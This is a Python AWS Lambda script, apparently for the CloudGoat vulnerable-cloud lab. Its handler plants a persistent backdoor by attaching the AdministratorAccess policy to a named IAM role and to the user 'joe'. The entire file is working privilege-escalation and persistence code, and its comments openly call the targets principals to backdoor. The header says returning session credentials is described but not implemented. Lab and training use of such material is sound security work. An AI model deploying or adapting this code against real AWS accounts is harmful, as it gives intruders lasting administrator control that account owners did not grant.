Lambda that backdoors CloudGoat's `lambda-dynamodb-cloudgoat` role (and the `joe` IAM user) by attaching the AWS-managed `AdministratorAccess` policy to them (it is a managed policy, not a role). The attachment persists until someone explicitly detaches it, so clean up after the exercise. As written, the handler only performs the attachments and returns an empty dict; returning temporary AWS session credentials on HTTP invocation is described but not implemented in this revision. Intended only for the deliberately vulnerable CloudGoat lab.
import boto3 | |
import json | |
# Managed policies granted to every backdoored principal. AWS-managed
# AdministratorAccess is the only entry; add more ARNs to stack policies.
POLICIES_TO_ATTACH = ['arn:aws:iam::aws:policy/AdministratorAccess']
# Principals that receive the policies above (CloudGoat lab names).
ROLE_TO_BACKDOOR = 'lambda-dynamodb-cloudgoat'
USER_TO_BACKDOOR = 'joe'
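def _attach_policies(attach, kind, name, **target):
    """Attach every policy in POLICIES_TO_ATTACH to a single IAM principal.

    Args:
        attach: the boto3 IAM call to use (attach_role_policy or
            attach_user_policy).
        kind: 'role' or 'user', used only in the log lines.
        name: the principal's name, used only in the log lines.
        **target: the principal keyword for ``attach`` (RoleName=... or
            UserName=...).

    Stops at the first failing policy and prints the error instead of
    raising, so a failure on one principal does not stop the caller from
    trying the next one; the Lambda's logs are its only error channel.
    """
    try:
        for pol in POLICIES_TO_ATTACH:
            attach(PolicyArn=pol, **target)
            print('[+] Attached policy ({}) to {} ({})'.format(pol, kind, name))
    except Exception as e:  # best-effort: report and move on
        print('[!] Backdooring {} failed: "{}"'.format(kind, str(e)))


def endpoint(event, context):
    """Lambda handler: grant POLICIES_TO_ATTACH to the lab role and user.

    Attaches each policy to ROLE_TO_BACKDOOR and then to USER_TO_BACKDOOR
    via the IAM API; the execution role therefore needs
    iam:AttachRolePolicy and iam:AttachUserPolicy, and the attachments
    persist until explicitly detached.

    Args:
        event: Lambda event (unused).
        context: Lambda context (unused).

    Returns:
        An empty dict; no credentials are produced by this handler.
    """
    iam = boto3.client('iam')
    resp = {}
    _attach_policies(iam.attach_role_policy, 'role', ROLE_TO_BACKDOOR,
                     RoleName=ROLE_TO_BACKDOOR)
    # Previously the user log line mislabeled the target as the role.
    _attach_policies(iam.attach_user_policy, 'user', USER_TO_BACKDOOR,
                     UserName=USER_TO_BACKDOOR)
    return resp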